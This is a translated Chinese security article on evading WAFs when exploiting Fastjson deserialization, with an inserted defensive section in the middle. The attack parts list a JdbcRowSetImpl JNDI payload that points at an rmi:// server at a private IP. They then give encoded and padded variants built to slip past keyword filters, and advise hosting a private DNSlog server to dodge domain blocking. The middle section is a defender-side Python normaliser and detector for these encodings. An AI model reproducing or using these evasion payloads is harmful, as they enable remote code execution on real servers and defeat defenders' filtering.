Bypassing the WAF
In recent years the WAF has become the number one enemy of deserialization vulnerabilities. Faced with WAF blocking, where do we go from here?
Fastjson by default strips spaces, \b, \n, \r, \f and similar characters around keys and values, and it also automatically decodes unicode and hexadecimal escapes in both keys and values. These features can be extended into bypass methods:
Original payload:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
Bypass versions:
{/s6/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
These get past keyword-based blocking.
By the same token, a large-packet bypass built on this lenient parsing is also possible:
{/s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6s6/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
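The flip side of the trick described above is that a WAF or request filter can apply the same normalisation Fastjson does before matching. The following is an added, defender-side example (not code from the original article or from the Fastjson project): it drops the characters Fastjson skips outside string literals, decodes \uXXXX and \xXX escapes inside them, and only then looks for an "@type" key over the whole body rather than a truncated prefix. It also reports how much of the body is padding, which is the signal the large-packet variant leaves behind. The skippable character set, the function names and the sample bodies in the test are assumptions constructed for this example.

```python
import re

# Characters Fastjson skips between tokens (per the article: space, \b, \n, \r, \f;
# \t added here as an assumption). Keep this in sync with the parser you front.
SKIPPABLE = " \b\n\r\f\t"

# A JSON string literal, allowing backslash escapes inside it.
_STRING_RE = re.compile(r'"((?:\\.|[^"\\])*)"')
# The two escape forms the article says Fastjson decodes in keys and values.
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
_HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
# Match on the canonical form only; the raw body is never inspected directly.
_AUTOTYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)"')


def decode_escapes(s: str) -> str:
    """Resolve \\uXXXX and \\xXX escapes so "\\u0040type" compares equal to "@type"."""
    s = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    s = _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    return s


def canonicalize(body: str) -> str:
    """Rewrite a request body into the form Fastjson effectively parses.

    Outside string literals, every skippable character is removed; inside
    them, escapes are decoded. The whole body is processed, so padding
    inserted before the first key does not hide it from the matcher.
    """
    out = []
    pos = 0
    for m in _STRING_RE.finditer(body):
        out.append("".join(c for c in body[pos:m.start()] if c not in SKIPPABLE))
        out.append('"' + decode_escapes(m.group(1)) + '"')
        pos = m.end()
    out.append("".join(c for c in body[pos:] if c not in SKIPPABLE))
    return "".join(out)


def find_autotype(body: str):
    """Return the class named by an "@type" key after normalisation, or None."""
    m = _AUTOTYPE_RE.search(canonicalize(body))
    return m.group(1) if m else None


def padding_ratio(body: str) -> float:
    """Fraction of the body made of skippable characters; near 1.0 means padding."""
    if not body:
        return 0.0
    return sum(1 for c in body if c in SKIPPABLE) / len(body)


def is_suspicious(body: str, max_padding: float = 0.8) -> bool:
    """Flag any body that resolves to an "@type" key or is mostly padding."""
    return find_autotype(body) is not None or padding_ratio(body) > max_padding


if __name__ == "__main__":
    # Constructed sample bodies mirroring the encodings discussed above.
    samples = [
        '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://placeholder.example:9999"}',
        '{\n"@type"\b:"com.sun.rowset.JdbcRowSetImpl"}',
        '{"\\u0040\\u0074\\u0079\\u0070\\u0065":"com.sun.rowset.JdbcRowSetImpl"}',
        '{"\\x40\\x74\\x79\\x70\\x65":"com.sun.rowset.JdbcRowSetImpl"}',
        '{"name":"alice","age":3}',
    ]
    for body in samples:
        print(is_suspicious(body), find_autotype(body), round(padding_ratio(body), 2))
```

Treat this as defence in depth only: the padding threshold needs tuning against pretty-printed JSON that legitimately carries whitespace, and the durable fix is on the application side, keeping autoType disabled (or on an explicit allow-list) so that an "@type" key has nothing to reach regardless of how it is encoded.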
Some WAFs also detect specific domains, such as public DNSlog platforms; in that case you can stand up your own DNSlog platform for testing:
You will need:
Two domains, or one Alibaba Cloud domain; one VPS; and the DNSlog project:
https://github.com/lanyi1998/DNSlog-GO/releases
Originally published by the WeChat public account Gamma实验室 (Gamma Lab): "Fastjson:我一路向北,离开有你的季节(下)" (Fastjson: Heading North, Leaving the Season That Had You, Part 2).